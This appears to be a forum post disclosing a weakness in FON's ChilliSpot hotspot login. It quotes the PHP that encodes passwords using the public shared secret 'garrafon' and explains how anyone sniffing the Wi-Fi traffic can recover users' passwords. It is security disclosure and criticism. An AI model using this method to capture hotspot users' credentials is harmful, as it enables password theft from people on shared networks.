let me tell you a bit about chillispot (the auth software of fon) how it works: 1. user tries to connect to a page, chilli sends back a redirect => user is redirected to fon login page (with some GET variables) 2. user logs in (sending user/pass and the GET variables to the fon server) 3. here's the basic code which the fon server executes now: [code]$hex_chal = pack('H32', $_GET['chal']); $newchal = pack('H*', md5($hex_chal."garrafon")); $newpwd = pack('a32', $_POST['password']); $password = implode ('', unpack('H32', ($newpwd ^ $newchal))); $query = '?username='.$_POST['user'].'&password='.$password.'&userurl='.urlencode($_GET['userurl']); header('Location: http://192.168.182.1:3990/logon'.$query);[/code] $_GET['chal'] is set by chillispot, it's a random 32 byte string, it's put together with the uamsecred "garrafon" (which you can compare with a en/de -cryption key) normally only the web server and chillispot should know it, it's used to generate the random md5 sting (the key). you can forget about security at this point already, due to everybody knows the uamsecred and can get the key by sniffing the chal var from the wlan traffic. now they just need to sniff the following redirect (with the "encrypted" password... That's the way how everybody who's able to sniff WLAN can get your password ;) and additionaly you can see where the fon page will redirect you to, your local chillispot server... 4. your AP's chillispot got the user name and the encoded password 5. chillispot decodes the password 6. chillispot will try to auth the user against the local users (aka friends & family users). Why do you think it takes up to an hour or a reboot of the router to get them working? Why F&F doesn't work with other firmwares? Yes, because they are stored locally and update via the heartbeat script (aka remote control script ;)) 7. if local users didn't match the password is encoded again (with the shared key, "garrafon" too...) and sent to FON the radius servers 8. depending on the radius reply chillispot will redirect you to the auth successful/failed page that's the way it works, a real nightmare for everybody who cares about security ;) and you see ssl just would prevent you form sending plain passwords. Hackers have to sniff two connections and not only one, additionally they have to run 5 more lines of code to decode your password! Just have a look where fon auth page redirecty you to ;) The only way to increase security is to run your own radius server with an own uamsecret which will send auth requests to the fon servers with the public uamsecret via a secure line. but this is still far from secure...